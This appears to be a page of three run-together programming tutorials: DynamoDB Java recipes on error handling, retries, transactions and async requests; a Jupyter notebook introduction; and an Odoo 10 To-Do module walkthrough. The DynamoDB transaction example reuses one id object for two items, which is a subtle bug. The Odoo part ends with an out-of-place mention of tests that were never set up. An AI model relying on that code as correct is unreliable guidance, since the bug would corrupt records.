PutObjectRequest(bucketName, keyName, file)); } Once the file is uploaded, you can save its path in one of the attributes of the product table, as follows: private static void putItemWithS3Link() { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("productTable"); Map<String, String> features = new HashMap<String, String>(); features.put("camera", "13MP"); features.put("intMem", "16GB"); features.put("processor", "Dual-Core 1.4 GHz Cyclone (ARM v8-based)"); Set<String> imagesSet = new HashSet<String>(); imagesSet.add("https://s3-us-west-2.amazonaws.com/ e-commerce-product-images/phone/apple/iphone6/iphone.jpg"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 250, "type", "phone")) .withString("mnfr", "Apple").withNumber("stock", 15) .withString("name", "iPhone 6").withNumber("price", 45) .withMap("features", features) .withStringSet("productImages", imagesSet); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } So whenever required, we can fetch the item by its key, and fetch the actual images from S3 using the URL saved in the productImages attribute. How it works… AWS S3 provides storage services at very cheaper rates. It's like a flat data dumping ground where we can store any type of file. So, it's always a good option to store large datasets in S3 and only keep its URL references in DynamoDB attributes. The URL reference will be the connecting link between the DynamoDB item and the S3 file. If your file is too large to be sent in one S3 client call, you may want to explore its multipart API, which allows you to send the file in chunks. Catching DynamoDB errors Till now, we discussed how to perform various operations in DynamoDB. We saw how to use AWS provided by SDK and play around with DynamoDB items and attributes. 
Amazon claims that AWS provides high availability and reliability, which is quite true considering the years of experience I have been using their services, but we still cannot deny the possibility where services such as DynamoDB might not perform as expected. So, it's important to make sure that we have a proper error catching mechanism to ensure that the disaster recovery system is in place. In this recipe, we are going to see how to catch such errors. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Catching errors in DynamoDB is quite easy. Whenever we perform any operations, we need to put them in the try block. Along with it, we need to put a couple of catch blocks in order to catch the errors. Here, we will consider a simple operation to put an item into the DynamoDB table: try { AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); DynamoDB dynamoDB = new DynamoDB(client); Table table = dynamoDB.getTable("productTable"); Item product = new Item() .withPrimaryKey(new PrimaryKey("id", 10, "type", "mobile")) .withString("mnfr", "Samsung").withNumber("stock", 15) .withBoolean("isProductionStopped", true) .withNumber("price", 45); PutItemOutcome outcome = table.putItem(product); System.out.println(outcome.getPutItemResult()); } catch (AmazonServiceException ase) { System.out.println("Error Message: " + ase.getMessage()); System.out.println("HTTP Status Code: " + ase.getStatusCode()); System.out.println("AWS Error Code: " + ase.getErrorCode()); System.out.println("Error Type: " + ase.getErrorType()); System.out.println("Request ID: " + ase.getRequestId()); } catch (AmazonClientException e) { System.out.println("Amazon Client Exception :" + e.getMessage()); } We should first catch AmazonServiceException, which arrives if the service you are trying to access throws any exception. AmazonClientException should be put last in order to catch any client-related exceptions. How it works… Amazon assigns a unique request ID for each and every request that it receives. Keeping this request ID is very important if something goes wrong, and if you would like to know what happened, then this request ID is the only source of information. We need to contact Amazon to know more about the request ID. There are two types of errors in AWS: Client errors: These errors normally occur when the request we submit is incorrect. The client errors are normally shown with a status code starting with 4XX. These errors normally occur when there is an authentication failure, bad requests, missing required attributes, or for exceeding the provisioned throughput. These errors normally occur when users provide invalid inputs. Server errors: These errors occur when there is something wrong from Amazon's side and they occur at runtime. The only way to handle such errors is retries; and if it does not succeed, you should log the request ID, and then you can reach the Amazon support with that ID to know more about the details. You can read more about DynamoDB specific errors at http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ErrorHandling.html. Performing auto-retries on DynamoDB errors As mentioned in the previous recipe, we can perform auto-retries on DynamoDB requests if we get errors. In this recipe, we are going to see how to perform auto=retries. 
Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Auto-retries are required if we get any errors during the first request. We can use the Amazon client configurations to set our retry strategy. By default, the DynamoDB client auto-retries a request if any error is generated three times. If we think that this is not efficient for us, then we can define this on our own, as follows: First of all, we need to create a custom implementation of RetryCondition. It contains a method called shouldRetry, which we need to implement as per our needs. Here is a sample CustomRetryCondition class: public class CustomRetryCondition implements RetryCondition { public boolean shouldRetry(AmazonWebServiceRequest originalRequest, AmazonClientException exception, int retriesAttempted) { if (retriesAttempted < 3 && exception.isRetryable()) { return true; } else { return false; } } } Similarly, we can implement CustomBackoffStrategy. The back-off strategy gives a hint on after what time the request should be retried. You can choose either a flat back-off time or an exponential back-off time: public class CustomBackoffStrategy implements BackoffStrategy { /** Base sleep time (milliseconds) **/ private static final int SCALE_FACTOR = 25; /** Maximum exponential back-off time before retrying a request */ private static final int MAX_BACKOFF_IN_MILLISECONDS = 20 * 1000; public long delayBeforeNextRetry(AmazonWebServiceRequest originalRequest, AmazonClientException exception, int retriesAttempted) { if (retriesAttempted < 0) return 0; long delay = (1 << retriesAttempted) * SCALE_FACTOR; delay = Math.min(delay, MAX_BACKOFF_IN_MILLISECONDS); return delay; } } Next, we need to create an instance of RetryPolicy, and set the RetryCondition and BackoffStrategy classes, which we created. Apart from this, we can also set a maximum number of retries. The last parameter is honorMaxErrorRetryInClientConfig. It means whether this retry policy should honor the maximum error retry set by ClientConfiguration.setMaxErrorRetry(int): RetryPolicy retryPolicy = new RetryPolicy(customRetryCondition, customBackoffStrategy, 3, false); Now, initiate the ClientConfiguration, and set the RetryPolicy we created earlier: ClientConfiguration clientConfiguration = new ClientConfiguration(); clientConfiguration.setRetryPolicy(retryPolicy); Now, we need to set this client configuration when we initiate the AmazonDynamoDBClient; and once done, your retry policy with a custom back-off strategy will be in place: AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider(), clientConfiguration); How it works… Auto-retries are quite handy when we receive a sudden burst in DynamoDB requests. If there are more number of requests than the provisioned throughputs, then auto-retries with an exponential back-off strategy will definitely help in handling the load. So if the client gets an exception, then it will get auto retried after sometime; and if by then the load is less, then there wouldn't be any loss for your application. The Amazon DynamoDB client internally uses HttpClient to make the calls, which is quite a popular and reliable implementation. So if you need to handle such cases, this kind of an implementation is a must. In case of batch operations, if any failure occurs, DynamoDB does not fail the complete operation. In case of batch write operations, if a particular operation fails, then DynamoDB returns the unprocessed items, which can be retried. 
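One more note on retrying batch writes, since the recipe above only mentions it in passing: the unprocessed items that DynamoDB returns can simply be resubmitted in a back-off loop. The recipes in this article use the Java SDK; the following is only an illustrative sketch in Python with boto3, and the region, table name, and item shapes are assumptions made for the example rather than part of the recipe:

import time

import boto3

dynamodb = boto3.client("dynamodb", region_name="us-east-1")

def batch_write_with_retries(request_items, max_retries=3, base_delay=0.025):
    # Keep resubmitting whatever DynamoDB reports back as unprocessed,
    # waiting exponentially longer between attempts.
    attempt = 0
    while request_items:
        response = dynamodb.batch_write_item(RequestItems=request_items)
        request_items = response.get("UnprocessedItems", {})
        if not request_items:
            return
        if attempt >= max_retries:
            raise RuntimeError("Unprocessed items remain after retries")
        time.sleep(min((2 ** attempt) * base_delay, 20))
        attempt += 1

# Hypothetical usage against the productTable used throughout this article
batch_write_with_retries({
    "productTable": [
        {"PutRequest": {"Item": {"id": {"N": "10"}, "type": {"S": "phone"}}}},
        {"PutRequest": {"Item": {"id": {"N": "11"}, "type": {"S": "book"}}}},
    ]
})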
Performing atomic transactions on DynamoDB tables I hope we are all aware that operations in DynamoDB are eventually consistent. Considering this nature it obviously does not support transactions the way we do in RDBMS. A transaction is a group of operations that need to be performed in one go, and they should be handled in an atomic nature. (If one operation fails, the complete transaction should be rolled back.) There might be use cases where you would need to perform transactions in your application. Considering this need, AWS has provided open sources, client-side transaction libraries, which helps us achieve atomic transactions in DynamoDB. In this recipe, we are going to see how to perform transactions on DynamoDB. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… To get started, we will first need to download the source code of the library from GitHub and build the code to generate the JAR file. You can download the code from https://github.com/awslabs/dynamodb-transactions/archive/master.zip. Next, extract the code and run the following command to generate the JAR file: mvn clean install –DskipTests On a successful build, you will see a JAR generated file in the target folder. Add this JAR to the project by choosing a configure build path in Eclipse: Now, let's understand how to use transactions. For this, we need to create the DynamoDB client and help this client to create two helper tables. The first table would be the Transactions table to store the transactions, while the second table would be the TransactionImages table to keep the snapshots of the items modified in the transaction: AmazonDynamoDBClient client = new AmazonDynamoDBClient( new ProfileCredentialsProvider()); client.setRegion(Region.getRegion(Regions.US_EAST_1)); // Create transaction table TransactionManager.verifyOrCreateTransactionTable(client, "Transactions", 10, 10, (long) (10 * 60)); // Create transaction images table TransactionManager.verifyOrCreateTransactionImagesTable(client, "TransactionImages", 10, 10, (long) (60 * 10)); Next, we need to create a transaction manager by providing the names of the tables we created earlier: TransactionManager txManager = new TransactionManager(client, "Transactions", "TransactionImages"); Now, we create one transaction, and perform the operations you will need to do in one go. Consider our product table where we need to add two new products in one single transaction, and the changes will reflect only if both the operations are successful. We can perform these using transactions, as follows: Transaction t1 = txManager.newTransaction(); Map<String, AttributeValue> product = new HashMap<String, AttributeValue>(); AttributeValue id = new AttributeValue(); id.setN("250"); product.put("id", id); product.put("type", new AttributeValue("phone")); product.put("name", new AttributeValue("MI4")); t1.putItem(new PutItemRequest("productTable", product)); Map<String, AttributeValue> product1 = new HashMap<String, AttributeValue>(); id.setN("350"); product1.put("id", id); product1.put("type", new AttributeValue("phone")); product1.put("name", new AttributeValue("MI3")); t1.putItem(new PutItemRequest("productTable", product1)); t1.commit(); Now, execute the code to see the results. If everything goes fine, you will see two new entries in the product table. In case of an error, none of the entries would be in the table. 
How it works… The transaction library when invoked, first writes the changes to the Transaction table, and then to the actual table. If we perform any update item operation, then it keeps the old values of that item in the TransactionImages table. It also supports multi-attribute and multi-table transactions. This way, we can use the transaction library and perform atomic writes. It also supports isolated reads. You can refer to the code and examples for more details at https://github.com/awslabs/dynamodb-transactions. Performing asynchronous requests to DynamoDB Till now, we have used a synchronous DynamoDB client to make requests to DynamoDB. Synchronous requests block the thread unless the operation is not performed. Due to network issues, sometimes, it can be difficult for the operation to get completed quickly. In that case, we can go for asynchronous client requests so that we submit the requests and do some other work. Getting ready To get started with this recipe, you should have your workstation ready with the Eclipse IDE. How to do it… Asynchronous client is easy to use: First, we need to the AmazonDynamoDBAsync class: AmazonDynamoDBAsync dynamoDBAsync = new AmazonDynamoDBAsyncClient( new ProfileCredentialsProvider()); Next, we need to create the request to be performed in an asynchronous manner. Let's say we need to delete a certain item from our product table. Then, we can create the DeleteItemRequest, as shown in the following code snippet: Map<String, AttributeValue> key = new HashMap<String, AttributeValue>(); AttributeValue id = new AttributeValue(); id.setN("10"); key.put("id", id); key.put("type", new AttributeValue("phone")); DeleteItemRequest deleteItemRequest = new DeleteItemRequest( "productTable", key); Next, invoke the deleteItemAsync method to delete the item. Here, we can optionally define AsyncHandler if we want to use the result of the request we had invoked. Here, I am also printing the messages with time so that we can confirm its asynchronous nature: dynamoDBAsync.deleteItemAsync(deleteItemRequest, new AsyncHandler<DeleteItemRequest, DeleteItemResult>() { public void onSuccess(DeleteItemRequest request, DeleteItemResult result) { System.out.println("Item deleted successfully: "+ System.currentTimeMillis()); } public void onError(Exception exception) { System.out.println("Error deleting item in async way"); } }); System.out.println("Delete item initiated" + System.currentTimeMillis()); How it works Asynchronous clients use AsyncHttpClient to invoke the DynamoDB APIs. This is a wrapper implementation on top of Java asynchronous APIs. Hence, they are quite easy to use and understand. The AsyncHandler is an optional configuration you can do in order to use the results of asynchronous calls. We can also use the Java Future object to handle the response. Summary We have covered various recipes on cost and performance efficient use of DynamoDB. Recipes like error handling and auto retries helps readers in make their application robust. It also highlights use of transaction library in order to implement atomic transaction on DynamoDB. Resources for Article: Further resources on this subject: The EMR Architecture[article] Amazon DynamoDB - Modelling relationships, Error handling[article] Index, Item Sharding, and Projection in DynamoDB [article]

Getting started with the Jupyter notebook (part 1)

Marin Gilles
02 Feb 2016
5 min read
The Jupyter notebook (previously known as the IPython notebook) is an interactive notebook in which you can run code from more than 40 programming languages. In this introduction, we will explore the main features of the Jupyter notebook and see why it can be such a powerful tool for anyone wanting to create beautiful interactive documents and educational resources.

To start working with the notebook, you will need to install it. You can find the full procedure on the Jupyter website. Once it is installed, start the notebook server from a terminal:

jupyter notebook

You will see something similar to the following displayed:

[I 20:06:36.367 NotebookApp] Writing notebook server cookie secret to /run/user/1000/jupyter/notebook_cookie_secret
[I 20:06:36.813 NotebookApp] Serving notebooks from local directory: /home/your_username
[I 20:06:36.813 NotebookApp] 0 active kernels
[I 20:06:36.813 NotebookApp] The IPython Notebook is running at: http://localhost:8888/
[I 20:06:36.813 NotebookApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).

And the main Jupyter window should open in the folder where you started the notebook (usually your user folder). The main window looks like this:

To create a new notebook, simply click on New and choose the kind of notebook you wish to start under the notebooks section. I only have a Python kernel installed locally, so I will start a Python notebook to work with. A new tab opens, and I get the notebook interface, completely empty. You can see the different parts of the notebook:

- The name of your notebook
- The main toolbar, with options to save your notebook, export, reload, restart the kernel, and so on
- Shortcuts
- The main part of the notebook, containing the contents of your notebook

Take the time to explore the menus and see your options. If you need help on a very specific subject, concerning the notebook or some libraries, you can try the Help menu at the right end of the menu bar.

In the main area, you can see what is called a cell. Each notebook is composed of multiple cells, and each cell is used for a different purpose. The first cell we have here, starting with In [ ], is a code cell. In this type of cell, you can type any code and execute it. For example, try typing 1 + 2 and then hit Shift + Enter. When you hit Shift + Enter, the code in the cell is evaluated, you are placed in a new cell, and you get the following:

You can easily identify the current working cell thanks to the green outline. Let's type something else in the second cell, for example:

for i in range(5):
    print(i)

When evaluating this cell, you then get:

As previously, the code is evaluated and the results are displayed properly. You may notice there is no Out[2] this time. This is because we printed the results, and no value was returned.

One very interesting feature of the notebook is that you can go back to a cell, change it, and re-evaluate it, thus updating your whole document. Try this by going back to the first cell, changing 1 + 2 to 2 + 3, and re-evaluating the cell by pressing Shift + Enter. You will notice that the result was updated to 5 as soon as you evaluated the cell. This can be very powerful when you want to explore data or test an equation with different parameters without having to re-evaluate your whole script. You can, however, re-evaluate the whole notebook at once by going to Cell -> Run all.

Now that we've seen how to enter code, why not try and get a more beautiful and explanatory notebook? To do this, we will use the other types of cells, the Header and Markdown cells.
First, let's add a title to our notebook at the very top. To do that, select the first cell, then click Insert -> Insert cell above. As you can see, a new cell was added at the very top of your document. However, this looks exactly like the previous one. Let's make it a title cell by clicking on the cell type menu, in the shortcut toolbar: You then change it to Heading. A pop-up will be displayed explaining how to create different levels of titles, and you will be left with a different type of cell: This cell starts with a # sign, meaning this is a level one title. If you want to make subtitles, you can just use the following notation (explained in the pop-up showing up when changing the cell type): # : First level title ## : Second level title ### : Third level title ... Write your title after the #, then evaluate the cell. You will see the display changing to show a very nice looking title. I added a few other title cells as an example, and an exercise for you: After adding our titles, let's add a few explanations about what we do in each code cell. For this, we will add a cell where we want it to be, and then change its type to Markdown. Then, evaluate your cell. That's it: your text is displayed beautifully! To finish this first introduction, you can rename your notebook by going to File -> Rename and inputing the new name of your notebook. It will then be displayed on the top left of your window, next to the Jupyter logo. In the next part of this introduction, we will go deeper in the capabilities of the notebook and the integration with other Python libraries. Click here to carry on reading now! About the author Marin Gilles is a PhD student in Physics, in Dijon, France. A large part of his work is dedicated to physical simulations for which he developed his own simulation framework using Python, and contributed to open-source libraries such as Matplotlib or IPython.

Building Your First Odoo Application

Packt
02 Jan 2017
22 min read
In this article by Daniel Reis, the author of the book Odoo 10 Development Essentials, we will create our first Odoo application and learn the steps needed to make it available to Odoo and install it. (For more resources related to this topic, see here.)

Inspired by the notable http://todomvc.com/ project, we will build a simple To-Do application. It should allow us to add new tasks, mark them as completed, and finally clear the task list of all the already completed tasks.

Understanding applications and modules

It's common to hear about Odoo modules and applications. But what exactly is the difference between them? Add-on modules are the building blocks of Odoo applications. A module can add new features to Odoo, or modify existing ones. It is a directory containing a manifest, or descriptor file, named __manifest__.py, plus the remaining files that implement its features. Applications are the way major features are added to Odoo. They provide the core elements for a functional area, such as Accounting or HR, on top of which additional add-on modules modify or extend features. Because of this, they are highlighted in the Odoo Apps menu.

If your module is complex and adds new or major functionality to Odoo, you might consider creating it as an application. If your module just makes changes to existing functionality in Odoo, it is likely not an application. Whether a module is an application or not is defined in the manifest. Technically, it does not have any particular effect on how the add-on module behaves; it is only used to highlight the module in the Apps list.

Creating the module basic skeleton

We should have the Odoo server at ~/odoo-dev/odoo/. To keep things tidy, we will create a new directory alongside it to host our custom modules, at ~/odoo-dev/custom-addons. Odoo includes a scaffold command to automatically create a new module directory, with a basic structure already in place. You can learn more about it with:

$ ~/odoo-dev/odoo/odoo-bin scaffold --help

You might want to keep this in mind when you start working on your next module, but we won't be using it right now, since we prefer to manually create the whole structure for our module.

An Odoo add-on module is a directory containing a __manifest__.py descriptor file. In previous versions, this descriptor file was named __openerp__.py. This name is still supported, but it is deprecated. The module also needs to be Python-importable, so it must have an __init__.py file as well. The module's directory name is its technical name. We will use todo_app for it. The technical name must be a valid Python identifier: it should begin with a letter and can only contain letters, numbers, and the underscore character.

The following commands create the module directory and create an empty __init__.py file in it, ~/odoo-dev/custom-addons/todo_app/__init__.py. In case you would like to do that directly from the command line, this is what you would use:

$ mkdir ~/odoo-dev/custom-addons/todo_app
$ touch ~/odoo-dev/custom-addons/todo_app/__init__.py

Next, we need to create the descriptor file. It should contain only a Python dictionary with about a dozen possible attributes; of these, only the name attribute is required. A longer description attribute and the author attribute also have some visibility and are advised.
We should now add a __manifest__.py file alongside the __init__.py file with the following content: { 'name': 'To-Do Application', 'description': 'Manage your personal To-Do tasks.', 'author': 'Daniel Reis', 'depends': ['base'], 'application': True, } The depends attribute can have a list of other modules that are required. Odoo will have them automatically installed when this module is installed. It's not a mandatory attribute, but it's advised to always have it. If no particular dependencies are needed, we should depend on the core base module. You should be careful to ensure all dependencies are explicitly set here; otherwise, the module may fail to install in a clean database (due to missing dependencies) or have loading errors, if by chance the other required modules are loaded afterwards. For our application, we don't need any specific dependencies, so we depend on the base module only. To be concise, we chose to use very few descriptor keys, but in a real word scenario, we recommend that you also use the additional keys since they are relevant for the Odoo apps store: summary: This is displayed as a subtitle for the module. version: By default, is 1.0. It should follow semantic versioning rules (see http://semver.org/ for details). license: By default, is LGPL-3. website: This is a URL to find more information about the module. This can help people find more documentation or the issue tracker to file bugs and suggestions. category: This is the functional category of the module, which defaults to Uncategorized. The list of existing categories can be found in the security groups form (Settings | User | Groups), in the Application field drop-down list. These other descriptor keys are also available: installable: It is by default True but can be set to False to disable a module. auto_install: If the auto_install module is set to True, this module will be automatically installed, provided all its dependencies are already installed. It is used for the Glue modules. Since Odoo 8.0, instead of the description key, we can use a README.rst or README.md file in the module's top directory. A word about licenses Choosing a license for your work is very important, and you should consider carefully what is the best choice for you, and its implications. The most used licenses for Odoo modules are the GNU Lesser General Public License (LGLP) and the Affero General Public License (AGPL). The LGPL is more permissive and allows commercial derivate work, without the need to share the corresponding source code. The AGPL is a stronger open source license, and requires derivate work and service hosting to share their source code. Learn more about the GNU licenses at https://www.gnu.org/licenses/. Adding to the add-ons path Now that we have a minimalistic new module, we want to make it available to the Odoo instance. For that, we need to make sure the directory containing the module is in the add-ons path, and then update the Odoo module list. We will position in our work directory and start the server with the appropriate add-ons path configuration: $ cd ~/odoo-dev $ ./odoo/odoo-bin -d todo --addons-path="custom-addons,odoo/addons" --save The --save option saves the options you used in a config file. This spares us from repeating them every time we restart the server: just run ./odoo-bin and the last saved options will be used. Look closely at the server log. It should have an INFO ? odoo: addons paths:[...] line. It should include our custom-addons directory. 
Remember to also include any other add-ons directories you might be using. For instance, if you also have a ~/odoo-dev/extra directory containing additional modules to be used, you might want to include them as well using the option: --addons-path="custom-addons,extra,odoo/addons". Now we need the Odoo instance to acknowledge the new module we just added.

Installing the new module

In the Apps top menu, select the Update Apps List option. This will update the module list, adding any modules that may have been added since the last update to the list. Remember that we need the developer mode enabled for this option to be visible. That is done in the Settings dashboard, in the link at the bottom right, below the Odoo version number information. Make sure your web client session is working with the right database. You can check that at the top right: the database name is shown in parentheses, right after the user name. A way to enforce using the correct database is to start the server instance with the additional option --db-filter=^MYDB$. The Apps option shows us the list of available modules. By default, it shows only application modules. Since we created an application module, we don't need to remove that filter to see it. Type todo in the search and you should see our new module, ready to be installed. Now click on the module's Install button and we're ready!

The Model layer

Now that Odoo knows about our new module, let's start by adding a simple model to it. Models describe business objects, such as an opportunity, a sales order, or a partner (customer, supplier, and so on). A model has a list of attributes and can also define its specific business logic. Models are implemented using a Python class derived from an Odoo template class. They translate directly to database objects, and Odoo automatically takes care of this when installing or upgrading the module. The mechanism responsible for this is the Object-Relational Mapping (ORM). Our module will be a very simple application to keep to-do tasks. These tasks will have a single text field for the description and a checkbox to mark them as complete. We should later add a button to clear the old completed tasks from the to-do list.

Creating the data model

The Odoo development guidelines state that the Python files for models should be placed inside a models subdirectory. For simplicity, we won't be following this here, so let's create a todo_model.py file in the main directory of the todo_app module. Add the following content to it:

# -*- coding: utf-8 -*-
from odoo import models, fields

class TodoTask(models.Model):
    _name = 'todo.task'
    _description = 'To-do Task'
    name = fields.Char('Description', required=True)
    is_done = fields.Boolean('Done?')
    active = fields.Boolean('Active?', default=True)

The first line is a special marker telling the Python interpreter that this file uses UTF-8, so that it can expect and handle non-ASCII characters. We won't be using any, but it's a good practice to have it anyway. The second line is a Python import statement, making available the models and fields objects from the Odoo core. The third line declares our new model. It's a class derived from models.Model. The next line sets the _name attribute, defining the identifier that will be used throughout Odoo to refer to this model. Note that the actual Python class name, TodoTask in this case, is meaningless to other Odoo modules. The _name value is what will be used as an identifier. Notice that this and the following lines are indented.
If you're not familiar with Python, you should know that this is important: indentation defines a nested code block, so these four lines should all be equally indented. Then we have the _description model attribute. It is not mandatory, but it provides a user friendly name for the model records, that can be used for better user messages. The last three lines define the model's fields. It's worth noting that name and active are special field names. By default, Odoo will use the name field as the record's title when referencing it from other models. The active field is used to inactivate records, and by default, only active records will be shown. We will use it to clear away completed tasks without actually deleting them from the database. Right now, this file is not yet used by the module. We must tell Python to load it with the module in the __init__.py file. Let's edit it to add the following line: from . import todo_model That's it. For our Python code changes to take effect the server instance needs to be restarted (unless it was using the --dev mode). We won't see any menu option to access this new model, since we didn't add them yet. Still we can inspect the newly created model using the Technical menu. In the Settings top menu, go to Technical | Database Structure | Models, search for the todo.task model on the list and then click on it to see its definition: If everything goes right, it is confirmed that the model and fields were created. If you can't see them here, try a server restart with a module upgrade, as described before. We can also see some additional fields we didn't declare. These are reserved fields Odoo automatically adds to every new model. They are as follows: id: A unique, numeric identifier for each record in the model. create_date and create_uid: These specify when the record was created and who created it, respectively. write_date and write_uid: These confirm when the record was last modified and who modified it, respectively. __last_update: This is a helper that is not actually stored in the database. It is used for concurrency checks. The View layer The View layer describes the user interface. Views are defined using XML, which is used by the web client framework to generate data-aware HTML views. We have menu items that can activate the actions that can render views. For example, the Users menu item processes an action also called Users, that in turn renders a series of views. There are several view types available, such as the list and form views, and the filter options made available are also defined by particular type of view, the search view. The Odoo development guidelines state that the XML files defining the user interface should be placed inside a views/ subdirectory. Let's start creating the user interface for our To-Do application. Adding menu items Now that we have a model to store our data, we should make it available on the user interface. For that we should add a menu option to open the To-do Task model so that it can be used. Create the views/todo_menu.xml file to define a menu item and the action performed by it: <?xml version="1.0"?> <odoo> <!-- Action to open To-do Task list --> <act_window id="action_todo_task" name="To-do Task" res_model="todo.task" view_mode="tree,form" /> <!-- Menu item to open To-do Task list --> <menuitem id="menu_todo_task" name="Todos" action="action_todo_task" /> </odoo> The user interface, including menu options and actions, is stored in database tables. 
The XML file is a data file used to load those definitions into the database when the module is installed or upgraded. The preceding code is an Odoo data file, describing two records to add to Odoo: The <act_window> element defines a client-side window action that will open the todo.task model with the tree and form views enabled, in that order The <menuitem> defines a top menu item calling the action_todo_task action, which was defined before Both elements include an id attribute. This id , also called an XML ID, is very important: it is used to uniquely identify each data element inside the module, and can be used by other elements to reference it. In this case, the <menuitem> element needs to reference the action to process, and needs to make use of the <act_window> id for that. Our module does not know yet about the new XML data file. This is done by adding it to the data attribute in the __manifest__.py file. It holds the list of files to be loaded by the module. Add this attribute to the descriptor's dictionary: 'data': ['views/todo_menu.xml'], Now we need to upgrade the module again for these changes to take effect. Go to the Todos top menu and you should see our new menu option available: Even though we haven't defined our user interface view, clicking on the Todos menu will open an automatically generated form for our model, allowing us to add and edit records. Odoo is nice enough to automatically generate them so that we can start working with our model right away. Odoo supports several types of views, but the three most important ones are: tree (usually called list views), form, and search views. We'll add an example of each to our module. Creating the form view All views are stored in the database, in the ir.ui.view model. To add a view to a module, we declare a <record> element describing the view in an XML file, which is to be loaded into the database when the module is installed. Add this new views/todo_view.xml file to define our form view: <?xml version="1.0"?> <odoo> <record id="view_form_todo_task" model="ir.ui.view"> <field name="name">To-do Task Form</field> <field name="model">todo.task</field> <field name="arch" type="xml"> <form string="To-do Task"> <group> <field name="name"/> <field name="is_done"/> <field name="active" readonly="1"/> </group> </form> </field> </record> </odoo> Remember to add this new file to the data key in manifest file, otherwise our module won't know about it and it won't be loaded. This will add a record to the ir.ui.view model with the identifier view_form_todo_task. The view is for the todo.task model and is named To-do Task Form. The name is just for information; it does not have to be unique, but it should allow one to easily identify which record it refers to. In fact the name can be entirely omitted, in that case it will be automatically generated from the model name and the view type. The most important attribute is arch, and contains the view definition, highlighted in the XML code above. The <form> tag defines the view type, and in this case contains three fields. We also added an attribute to the active field to make it read-only. Adding action buttons Forms can have buttons to perform actions. These buttons are able to trigger workflow actions, run window actions—such as opening another form, or run Python functions defined in the model. They can be placed anywhere inside a form, but for document-style forms, the recommended place for them is the <header> section. 
For our application, we will add two buttons to run the methods of the todo.task model: <header> <button name="do_toggle_done" type="object" string="Toggle Done" class="oe_highlight" /> <button name="do_clear_done" type="object" string="Clear All Done" /> </header> The basic attributes of a button comprise the following: The string attribute that has the text to be displayed on the button The type attribute referring to the action it performs The name attribute referring to the identifier for that action The class attribute, which is an optional attribute to apply CSS styles, like in regular HTML The complete form view At this point, our todo.task form view should look like this: <form> <header> <button name="do_toggle_done" type="object" string="Toggle Done" class="oe_highlight" /> <button name="do_clear_done" type="object" string="Clear All Done" /> </header> <sheet> <group name="group_top"> <group name="group_left"> <field name="name"/> </group> <group name="group_right"> <field name="is_done"/> <field name="active" readonly="1" /> </group> </group> </sheet> </form> Remember that for the changes to be loaded to our Odoo database, a module upgrade is needed. To see the changes in the web client, the form needs to be reloaded: either click again on the menu option that opens it or reload the browser page (F5 in most browsers). The action buttons won't work yet, since we still need to add their business logic. The business logic layer Now we will add some logic to our buttons. This is done with Python code, using the methods in the model's Python class. Adding business logic We should edit the todo_model.py Python file to add to the class the methods called by the buttons. First we need to import the new API, so add it to the import statement at the top of the Python file: from odoo import models, fields, api The action of the Toggle Done button will be very simple: just toggle the Is Done? flag. For logic on records, use the @api.multi decorator. Here, self will represent a recordset, and we should then loop through each record. Inside the TodoTask class, add this: @api.multi def do_toggle_done(self): for task in self: task.is_done = not task.is_done return True The code loops through all the to-do task records, and for each one, modifies the is_done field, inverting its value. The method does not need to return anything, but we should have it to at least return a True value. The reason is that clients can use XML-RPC to call these methods, and this protocol does not support server functions returning just a None value. For the Clear All Done button, we want to go a little further. It should look for all active records that are done and make them inactive. Usually, form buttons are expected to act only on the selected record, but in this case, we will want it also act on records other than the current one: @api.model def do_clear_done(self): dones = self.search([('is_done', '=', True)]) dones.write({'active': False}) return True On methods decorated with @api.model, the self variable represents the model with no record in particular. We will build a dones recordset containing all the tasks that are marked as done. Then, we set on the active flag to False on them. The search method is an API method that returns the records that meet some conditions. These conditions are written in a domain, which is a list of triplets. The write method sets the values at once on all the elements of a recordset. The values to write are described using a dictionary. 
Using write here is more efficient than iterating through the recordset to assign the value to each record one by one.

Setting up access security

You might have noticed that, upon loading, our module is getting a warning message in the server log: The model todo.task has no access rules, consider adding one. The message is pretty clear: our new model has no access rules, so it can't be used by anyone other than the admin super user. As a super user, the admin ignores data access rules, and that's why we were able to use the form without errors. But we must fix this before other users can use our model. Another issue yet to be addressed is that we want the to-do tasks to be private to each user. Odoo supports row-level access rules, which we will use to implement that.

Adding access control security

To get a picture of what information is needed to add access rules to a model, use the web client and go to Settings | Technical | Security | Access Controls List. Here we can see the ACL for some models. It indicates, per security group, what actions are allowed on records. This information has to be provided by the module, using a data file to load the lines into the ir.model.access model. We will add full access to the Employee group on the model. Employee is the basic access group nearly everyone belongs to. This is done using a CSV file named security/ir.model.access.csv. Let's add it with the following content:

id,name,model_id:id,group_id:id,perm_read,perm_write,perm_create,perm_unlink
access_todo_task_group_user,todo.task.user,model_todo_task,base.group_user,1,1,1,1

The filename corresponds to the model to load the data into, and the first line of the file has the column names. These are the columns provided by the CSV file:

id: This is the record's external identifier (also known as XML ID). It should be unique in our module.
name: This is a description title. It is only informative, and it's best if it's kept unique. Official modules usually use a dot-separated string with the model name and the group. Following this convention, we used todo.task.user.
model_id: This is the external identifier for the model we are giving access to. Models have XML IDs automatically generated by the ORM: for todo.task, the identifier is model_todo_task.
group_id: This identifies the security group to give permissions to. The most important ones are provided by the base module. The Employee group is such a case and has the identifier base.group_user.

The last four perm fields flag whether to grant read, write, create, or unlink (delete) access. We must not forget to add the reference to this new file in the __manifest__.py descriptor's data attribute. It should look like this:

'data': [
    'security/ir.model.access.csv',
    'views/todo_view.xml',
    'views/todo_menu.xml',
],

As before, upgrade the module for these additions to take effect. The warning message should be gone, and we can confirm that the permissions are OK by logging in with the user demo (the password is also demo). If we run our tests now, they should fail only the test_record_rule test case.

Summary

